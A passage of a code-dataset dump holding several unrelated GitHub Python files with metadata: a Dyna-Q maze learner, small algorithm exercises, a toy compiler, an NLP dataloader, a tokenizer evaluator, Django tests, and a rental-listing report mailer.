(row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]]\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def argmax_bonus(self, state):\n '''\n Finds the argmax_a and max_a for a given state. 
Used Dyna-Q+ with bonus on the action value\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value + bonus\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), 0])\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), i]) > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def epsilon_greedy(self, state):\n '''\n Selects an action based on the epsilon-greedy method\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n\n '''\n rand_val = np.random.random()\n if rand_val >= self.epsilon:\n action, _ = self.argmax(state)\n else:\n action = np.random.randint(0,len(self.A))\n return action\n\n def epsilon_greedy_bonus(self, state):\n '''\n Selects an action based on the epsilon-greedy method\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n\n '''\n rand_val = np.random.random()\n if rand_val >= self.epsilon:\n action, _ = self.argmax_bonus(state)\n else:\n action = np.random.randint(0,len(self.A))\n return action\n\n def Q_step(self, state, action, reward, new_state):\n act = self.A[action]\n _, max_a_new_state = self.argmax(new_state)\n self.Q[state, act] += self.alpha * (reward + self.gamma * max_a_new_state - self.Q[state, act])\n return\n\n def update_model(self, state, action, reward, new_state):\n act = self.A[action]\n self.previously_selected[self.S.index(state), self.A.index(act)] = 1\n self.Model[state, act][0] = reward\n self.Model[state, act][1] = new_state\n return\n\n def planning_DynaQ(self):\n for _ in range(0,self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n model_sa = self.Model[state, action]\n reward = model_sa[0]\n new_state = model_sa[1]\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n def planning_DynaQPlus_reward(self):\n for _ in range(0, self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n model_sa = self.Model[state, action]\n reward = model_sa[0] + self.kappa * math.sqrt(self.lastVisited[prev_state, prev_action])\n new_state = model_sa[1]\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n def planning_DynaQPlus_action(self):\n for i in range(0, self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n if (self.previously_selected[prev_state, prev_action] == 1):\n model_sa = self.Model[state, action]\n reward = model_sa[0]\n new_state = model_sa[1]\n else:\n reward = 0\n new_state = state\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n\n def random_observed_state(self):\n indeces = np.where(self.previously_selected == 1)[0]\n return np.random.choice(indeces)\n\n def random_prev_action(self, state_index):\n indeces = np.where(self.previously_selected[state_index, :] == 1)[0]\n return np.random.choice(indeces)\n\n def update_last_visited(self, state, action):\n act = self.A[action]\n self.lastVisited += 1\n self.lastVisited[self.S.index(state), self.A.index(act)] = 0\n return\n\n\n\n\ndef main():\n steps_per_n_avg = 
np.ndarray((10,10))\n epsilon = 0.3\n gamma = 0.95\n alpha = 0.7\n kappa = 0.01\n n = 10\n num_steps = 100000\n num_iterations_to_avg = 10\n\n avg_DynaQ = np.zeros((num_iterations_to_avg, num_steps))\n avg_DynaQPlus_reward = np.zeros((num_iterations_to_avg, num_steps))\n avg_DynaQPlus_action = np.zeros((num_iterations_to_avg, num_steps))\n\n for k in range(0, num_iterations_to_avg):\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQ(env, agent, num_steps)\n avg_DynaQ[k, :] = cum_reward\n\n\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQPlus_action(env, agent, num_steps)\n avg_DynaQPlus_action[k, :] = cum_reward\n\n\n\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQPlus_reward(env, agent, num_steps)\n avg_DynaQPlus_reward[k, :] = cum_reward\n\n avg_DynaQ = np.mean(avg_DynaQ, axis = 0)\n DynaQ_plot, = plt.plot(np.arange(num_steps), avg_DynaQ, 'r', label='Dyna-Q Learning (n = 4)')\n avg_DynaQPlus_action = np.mean(avg_DynaQPlus_action, axis = 0)\n DynaQAction_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_action, 'g', label='Dyna-Q+ Learning, bonus on action (n = 4)')\n avg_DynaQPlus_reward = np.mean(avg_DynaQPlus_reward, axis = 0)\n DynaQReward_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_reward, 'b', label='Dyna-Q+ Learning, bonus on reward (n = 4)')\n\n plt.title(\"Cumulative reward vs Number of steps\")\n plt.ylabel(\"Cumulative reward\")\n plt.xlabel(\"Number of steps\")\n plt.legend(handles=[Q_plot, DynaQ_plot])\n plt.savefig('cumReward.png', dpi=300, bbox_inches='tight')\n\n plt.close()\n plot_on_track(env, episode_info)\n plt.imshow(env.maze * 5, cmap='hot', interpolation='nearest')\n plt.title(str(\"Number of steps: \" + str(episode_info.shape[0])))\n plt.savefig('figure.png', dpi=300, bbox_inches='tight')\n\n\ndef generate_episode_DynaQ(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQ()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_reward(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_reward()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, 
current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_action(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy_bonus(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_action()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef starting_state(env):\n possible_starts = np.where(env.maze[-1,:] == 500)[0]\n i = np.random.randint(0,len(possible_starts))\n state = (env.maze.shape[0]-1, possible_starts[i])\n return state\n\n\ndef state_transition(env, agent, state, action):\n act = agent.A[action]\n crossed_boundary = False\n crossed_finish = False\n reward = 0\n temp_state = list(state)\n\n temp_state[0] += act[0]\n temp_state[1] += act[1]\n\n if (not in_track(env, temp_state)):\n crossed_boundary = True\n return state, crossed_boundary, crossed_finish, reward\n if in_finish_line(env, temp_state):\n reward = 1\n crossed_finish = True\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n\ndef in_track(env, state):\n return in_bounds(env, state) and (env.maze[state[0], state[1]] != 0)\n\ndef in_bounds(env, state):\n return (state[0] >= 0 and state[0] < env.maze.shape[0]) and (state[1] >= 0 and state[1] < env.maze.shape[1])\n\ndef in_finish_line(env, state):\n return env.maze[state[0], state[1]] == 100\n\ndef plot_on_track(env, trajectories):\n for i in range(0, trajectories.shape[0]):\n state = trajectories[i, 0]\n env.maze[state[0], state[1]] += 5\n\ndef update_cum_reward(reward_list, current_reward):\n number_rewards = len(reward_list)\n if number_rewards == 0:\n reward_list.append(current_reward)\n else:\n last_reward = reward_list[number_rewards - 1]\n reward_list.append(last_reward + current_reward)\n return reward_list\n\ndef change_maze(env, agent):\n env.maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n agent.maze = env.maze\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mateoguaman/Reinforcement-Learning","sub_path":"HW3/maze2.py","file_name":"maze2.py","file_ext":"py","file_size_in_byte":14490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29380979611","text":"import sys\nfrom collections import deque\nfrom heapq import heappush, heappop\nsys.setrecursionlimit(10**9)\nsys.stdin = open('../input.txt')\n\ndef post(start, end):\n if start > end:\n return\n mid = end + 1\n for i in range(start+1, end+1):\n if Num[i] > Num[start]:\n mid = i\n break\n\n post(start+1, mid-1)\n post(mid, end)\n print(Num[start])\n\nif __name__==\"__main__\":\n Num = list()\n while True:\n try:\n N = int(input())\n Num.append(N)\n except:\n break\n\n post(0, len(Num)-1)","repo_name":"Taesun0727/Algorithms","sub_path":"Python/BaekJoon/5639/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"23312466124","text":"from pila import Pila\r\n\r\nfrom functools import reduce\r\n\r\ndiccionario=['*','/','+','-','=']\r\nvariables = {}\r\nerror=[]\r\n\r\ndef esOperador(diccionario,ch):\r\n if(len([x for x in diccionario if x==ch])>0):\r\n return True\r\n else:\r\n return False\r\n\r\ndef verDiccionario(diccionario,ch):\r\n if(esOperador(diccionario,ch)):\r\n return True\r\n elif (ch.isdigit()):\r\n return True\r\n elif (ch.isalpha()):\r\n return True\r\n else:\r\n return False\r\n\r\ndef estaAsignada(variable):\r\n if (variable in variables):\r\n return True\r\n else:\r\n return False\r\n\r\ndef analisis(lista):\r\n for x in lista:\r\n for ch in x:\r\n if(not verDiccionario(diccionario,ch)):\r\n error.append(\"Error caracter no válido \"+ch)\r\n if (not(len(error)>0)):\r\n pila= Pila()\r\n for x in lista:\r\n if(not(len(error)>0)):\r\n analisisSintactico(x)\r\n for ch in x:\r\n if(not(len(error)>0)):\r\n pila.apilar(ch)\r\n if(ch==\"=\"):\r\n pila.desapilar()\r\n elif((ch.isalpha)and (not(ch.isdigit())) and (not(esOperador(diccionario,ch)))):\r\n if(ch==x[len(x)-2]):\r\n pila.desapilar()\r\n if(len(pila.items)>1):\r\n error.append(\"Error no hay operador\")\r\n else:\r\n variables[ch]=pila.desapilar()\r\n else:\r\n if(estaAsignada(ch)):\r\n pila.desapilar()\r\n pila.apilar(variables[ch])\r\n else:\r\n error.append(\"Error variable inexistente \"+ch)\r\n elif((len(pila.items)>2)and(esOperador(diccionario,ch))):\r\n signo = pila.desapilar()\r\n num2 = pila.desapilar()\r\n num1 = pila.desapilar()\r\n pila.apilar(resolver(num1,num2,signo))\r\n else:\r\n print(error)\r\n else:\r\n print(error)\r\n print(variables)\r\n else: \r\n print(error)\r\n\r\ndef evaluar(num1,num2,signo):\r\n if signo=='+':\r\n return str(int(num1) + int(num2))\r\n elif signo=='-':\r\n return str(int(num1) - int(num2))\r\n elif signo=='*':\r\n return str(int(num1) * int(num2))\r\n elif signo=='/':\r\n return str(int((int(num1) / int(num2))))\r\n else:\r\n return 0\r\n \r\n \r\n\r\ndef resolver(num1,num2,signo):\r\n if(num1.isdigit())and(num2.isdigit())and(esOperador(diccionario,signo)):\r\n return evaluar(num1,num2,signo)\r\n else:\r\n error.append(\"Error sintaxis invalida \"+num2+\" \"+signo+\" \"+num1)\r\n return 0\r\n \r\ndef analisisSintactico(lista):\r\n if(esOperador(diccionario,lista[0])):\r\n error.append(\"Analisis Sintactico: incorrecto, No puede iniciar con un operador\")\r\n elif(lista[len(lista)-1] != '='):\r\n error.append(\"Analisis Sintactico: incorrecto, No hay operaador de igualdad\")\r\n elif(not(lista[len(lista)-2].isalpha())):\r\n error.append(\"Analisis Sintactico: incorrecto, No hay variable para asignar valor\")\r\n \r\n\r\na=open(\"datos.txt\",'r')\r\nlistaG= [y.split() for y in [x.strip('\\n') for x in a.readlines()]]\r\n\r\nanalisis(listaG)\r\n\r\n\r\n\r\n\r\n","repo_name":"SCVA/CompiladoresIntro","sub_path":"Ejercicio compilador/compilador.py","file_name":"compilador.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21852675959","text":"# Linear_search \r\n\r\ndef linear_search(alist,item):\r\n pos=0\r\n found=False\r\n\r\n while positem:\r\n stop=True\r\n else:\r\n pos+=1\r\n return found\r\n\r\nalist=[1,2,3,4,5,6,7,8,9,10]\r\nprint(linear_search1(alist,3))\r\nprint(linear_search1(alist,13))\r\n","repo_name":"rahul9852-dot/Data-Structure-and-Algorithms","sub_path":"DSA/searching&sorting/linear_searching.py","file_name":"linear_searching.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"24592828156","text":"import file_processor\nimport user_interface\n\nINPUT_FILE_NAME = 'text.txt'\n\n\ndef main():\n \"\"\"\n Main function of the application that initiates the text file processing.\n Process Flow:\n 1. Gets the path to the input text file (input_file_path) and the maximum\n line size (max_chunk_size)\n using the user interface from the user_interface module.\n 2. Processes the text file by splitting lines into chunks and saves the\n result in a separate file.\n This process is done using the process_file function from the\n file_processor module.\n \"\"\"\n\n # Path to the input text file (can be changed to another file).\n input_file_path = INPUT_FILE_NAME\n # Get the maximum line size.\n max_chunk_size = user_interface.get_max_chunk_size_from_user()\n\n # Start processing the text file with the specified maximum line size.\n file_processor.process_file(input_file_path, max_chunk_size)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-69-23","sub_path":"Tasks/Romanychev/Task4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"30398302927","text":"from direct.gui.OnscreenText import OnscreenText \r\nfrom direct.gui.DirectGui import *\r\n\r\nfrom panda3d.core import NodePath\r\nfrom panda3d.core import TextNode\r\n\r\nclass TextInput():\r\n \r\n def __init__(self, pos, onEnterTextFn):\r\n self.onEnterTextFn = onEnterTextFn\r\n self.bk_text = \"This is my Demo\"\r\n# self.textObject = OnscreenText(text = self.bk_text, pos = (0.95,-0.95), \r\n# scale = 0.07, fg = (1,0.5,0.5,1), \r\n# align = TextNode.ACenter,mayChange=1)\r\n \r\n self.addText(pos)\r\n \r\n def addText(self, pos):\r\n self.entry = DirectEntry(text = \"\", scale=.05, command = self.setText,\r\n initialText=\"Type Something\", numLines = 2, \r\n focus=1, focusInCommand = self.clearText)\r\n entry = self.entry\r\n# entry.setColor(1, 1, 1, 0.5)\r\n entry.setPos(pos.x, 0, pos.y)\r\n print(\"bounds \" + str(entry.getHeight()))\r\n# entry.\r\n \r\n# self.entry.setObscureMode()\r\n \r\n def setText(self, textEntered):\r\n self.entry.destroy()\r\n self.onEnterTextFn(textEntered)\r\n \r\n def clearText(self):\r\n self.entry.enterText('')\r\n \r\n\r\n \r\n ","repo_name":"Nickan/Mind-Map-Panda3D","sub_path":"src/gui/textinput.py","file_name":"textinput.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12255578938","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom datasets import load_dataset\nfrom transformers import AutoModel, AutoTokenizer\n\n\ndef collate_fn(batch):\n batch_input_ids = torch.stack([torch.tensor(x[\"input_ids\"]) for x in batch])\n batch_attention_masks = torch.stack([torch.tensor(x[\"attention_mask\"]) for x in batch])\n\n model = AutoModel.from_pretrained(\"distilbert-base-uncased\")\n outputs = model(batch_input_ids, attention_mask=batch_attention_masks)\n\n batch_inputs = outputs.last_hidden_state\n batch_outputs = torch.stack([torch.tensor(x[\"label\"]) for x in batch])\n return batch_inputs, batch_outputs\n\n\ndef get_dataloader_and_vocab(batch_size, split):\n tokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\n dataset = load_dataset(\"rotten_tomatoes\", split=split)\n encoded_dataset = dataset.map(lambda batch: tokenizer(batch[\"text\"], padding=True, truncation=True), batched=True, batch_size=None)\n\n dataloader = DataLoader(encoded_dataset, batch_size=batch_size, shuffle=True, collate_fn=collate_fn)\n vocab = tokenizer.get_vocab()\n\n return dataloader, vocab\n\n\nif __name__ == \"__main__\":\n train_dataloader, vocab = get_dataloader_and_vocab(64, \"train\")\n batch_inputs, batch_outputs = next(iter(train_dataloader))\n print(batch_inputs.shape, batch_outputs.shape)\n","repo_name":"benjaminpodmore/nlp","sub_path":"RNN/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28297135767","text":"from features import scan\nfrom data import Data\nfrom random import choice\nfrom utils import draw_bar\n\nfrom typing import List\n\n\ndef evaluate(data: Data, prediction: str, example: bool = False) -> None:\n \"\"\"\n Evaluate data object on provided prediction prolix tag sequence.\n \"\"\"\n\n if len(data.trueTokenization) != len(prediction):\n raise Exception(\n f'True data length ({len(data.trueTokenization)}) does not match prediction length ({len(prediction)})'\n )\n\n wTP = 0\n wFP = 0\n wTN = 0\n wFN = 0\n\n indexFP = []\n indexFN = []\n\n POSITIVE = {'W', 'B'}\n NEGATIVE = {'N', 'S'}\n for i, (trueTag, predTag) in enumerate(zip(data.trueTokenization, prediction)):\n if trueTag in NEGATIVE and predTag in NEGATIVE:\n wTN += 1\n elif trueTag in POSITIVE and predTag in POSITIVE:\n wTP += 1\n elif trueTag in POSITIVE and predTag in NEGATIVE:\n wFN += 1\n indexFN.append(i)\n elif trueTag in NEGATIVE and predTag in POSITIVE:\n wFP += 1\n indexFP.append(i)\n\n def safeDiv(x: float, y: float):\n return x/y if y != 0 else float('nan')\n\n total = wTP + wFP + wTN + wFN\n wTP = safeDiv(wTP, total)\n wFP = safeDiv(wFP, total)\n wTN = safeDiv(wTN, total)\n wFN = safeDiv(wFN, total)\n\n print('Any-level: ')\n print(f'TP: {wTP*100:6.2f}%, FP: {wFP*100:6.2f}%')\n print(f'FN: {wFN*100:6.2f}%, TN: {wTN*100:6.2f}%')\n print(f'Precision: {wTP/(wTP+wFP)*100:6.2f}%')\n print(f'Recall: {wTP/(wTP+wFN)*100:6.2f}%')\n\n if example:\n show_sample(data, prediction, indexFN, indexFP)\n\n draw_bar()\n\n\ndef show_sample(data: Data, prediction: str, indexFN: List[int], indexFP: List[int], window: int = 20) -> None:\n if indexFP or indexFN:\n print()\n if indexFN:\n index = choice(indexFN)\n print('False Negative example')\n print(data.all[index-window:index+window], sep='')\n print(prediction[index-window:index+window], sep='')\n if indexFP:\n index = choice(indexFP)\n print('False Positive example')\n print(data.all[index-window:index+window], sep='')\n print(prediction[index-window:index+window], sep='')\n\n\ndef decode(data: Data, prediction: str) -> None:\n \"\"\"\n Decode input string against predicted sequence\n \"\"\"\n out = []\n buffer = ''\n for tag, char in zip(prediction, data.all):\n buffer += char\n if tag in {'W', 'B'}:\n out.append(buffer)\n buffer = ''\n out += buffer\n out = [x.strip() for x in out]\n return '|' + '|'.join(out) + '|'\n","repo_name":"zouharvi/hmm-tokenizer","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"19982448080","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import unicode_literals\nimport logging\nimport unittest\nimport json\nfrom bs4 import BeautifulSoup\nfrom django.test import Client\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n\n\nclass FetchAllExplanationsTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_regions(self, document):\n resp = self.client.post(\n '/python/scan',\n data={'origin': 'www.test.com', 'document': document})\n regions = json.loads(resp.content)['regions']\n return regions\n\n def test_get_region(self):\n string = \" abs(2) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 1)\n r = regions[0]\n self.assertEqual(\n r['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r['start_index'], 0)\n self.assertEqual(r['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r['document']).text\n )\n\n def test_get_multiple_regions(self):\n string = \" abs(2)\\nlen('fdsjkfds')\\nbin(1) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 3)\n r0 = regions[0]\n self.assertEqual(\n r0['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r0['start_index'], 0)\n self.assertEqual(r0['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r0['document']).text\n )\n\n r1 = regions[1]\n self.assertEqual(\n r1['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r1['start_index'], 7)\n self.assertEqual(r1['end_index'], 9)\n self.assertIn(\n \"Return the length (the number of items) of an object.\",\n BeautifulSoup(r1['document']).text\n )\n\n\nclass FetchExplanationForPlaintextTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_explanation(self, text):\n resp = self.client.post(\n '/python/explain',\n data={'origin': 'www.test.com', 'text': text})\n return resp.content\n\n def test_explain_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip')\n self.assertIn(\"This function returns a list of tuples,\", resp)\n\n def test_fail_to_explain_invalid_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip()')\n self.assertIn(\"'zip()' could not be explained as a python built-in.\", resp)\n","repo_name":"andrewhead/tutorons-server","sub_path":"tutorons/tests/python/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"}
+{"seq_id":"14300387890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 25 20:45:59 2021\n\n@author: RISHBANS\n\"\"\"\n\nimport pandas as pd\ntennis_data = pd.read_csv(\"tennis.csv\")\n\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\no_e = OrdinalEncoder()\nX = tennis_data.drop(columns=['play'])\ny = tennis_data.play\n\nX = o_e.fit_transform(X)\n\ndt = DecisionTreeClassifier(criterion='entropy')\ndt.fit(X, y)\nprint(o_e.categories_)\n\ndt.predict([[1,0,1,0]])\n\n","repo_name":"edyoda/ML-with-Rishi","sub_path":"dt_tennis.py","file_name":"dt_tennis.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"32881100298","text":"# -*- coding: utf-8 -*-\n# Reporter: Send data email to recver.\n\nfrom module.mail.mail import Sender\nfrom module.database.db_opter import DBController\nfrom module.config.reporter import RPTerConfigReader\nfrom util.xlsx.writer import write_xlsx\nfrom util.common.date import Time\n\nimport os\nimport shutil\n\nclass Do():\n\n def __init__(self, rpt_name):\n self.rpt_name = rpt_name\n self.rpt_conf = RPTerConfigReader.rpter_config(rpt_name)\n self.db = DBController(rpt_name)\n\n def do(self):\n lj_path = self.data_from_db_lj\n qk_path = self.data_from_db_qk\n dk_path = self.data_from_db_dk\n zr_path = self.data_from_db_zr\n\n self.sender = Sender(\n msg = \"%s\\n数据采样时间:%s\"%(self.rpt_conf['recv']['recv_msg'], Time.now_date_str()),\n subject = \"%s => %s\"%(self.rpt_conf['recv']['recv_sub'], Time.now_date_str()),\n recvers = self.rpt_conf['recv']['recv_mail']\n )\n\n self.sender.add_attachment(*lj_path)\n self.sender.add_attachment(*qk_path)\n self.sender.add_attachment(*dk_path)\n self.sender.add_attachment(*zr_path)\n\n self.sender.send()\n\n\n def __data_from_db__(self, SQL, filename, sheetname, orderlist):\n RPT_PATH = \"./_output/{rpt}\".format(\n rpt = self.rpt_name\n )\n XLSX_PATH = \"{rpt}/{date}\".format(\n rpt = RPT_PATH,\n date = Time.now_date_str()\n )\n\n if not os.path.exists(RPT_PATH):\n os.mkdir(RPT_PATH)\n\n if not os.path.exists(XLSX_PATH):\n os.mkdir(XLSX_PATH)\n\n path = \"{xlsx}/{filename}.xlsx\".format(\n xlsx = XLSX_PATH,\n filename = sheetname\n )\n\n if os.path.exists(path):\n os.remove(path)\n\n self.db.execute(SQL)\n data = self.db.cur.fetchall()\n \n with write_xlsx(path, sheetname) as x:\n for d in data:\n x.write_dict(d, orderlist=orderlist)\n return filename, path\n\n @property\n def data_from_db_lj(self):\n '''data_from_db_lj\n Get Lianjia house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type_new as '房型', h.house_area as '房屋面积',\n h.house_price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infolj h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 1 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '链家信息采集'\n filename = 'LianjiaHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n\n @property\n def data_from_db_qk(self):\n '''data_from_db_qk\n Get Qingke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', '' as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infoqk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 3 and \n h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '青客信息采集'\n filename = 'QingkeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_dk(self):\n '''data_from_db_dk\n Get Danke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type as '房型', h.area 
as '房屋面积',\n h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infodk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 4 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '蛋壳信息采集'\n filename = 'DankeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_zr(self):\n '''data_from_db_zr\n Get Ziroom house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', h.house_type as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称', \n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infozr h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 2 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> ''\n and h.house_id <> ''\n \"\"\"\n sheetname = '自如信息采集'\n filename = 'ZiroomHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, 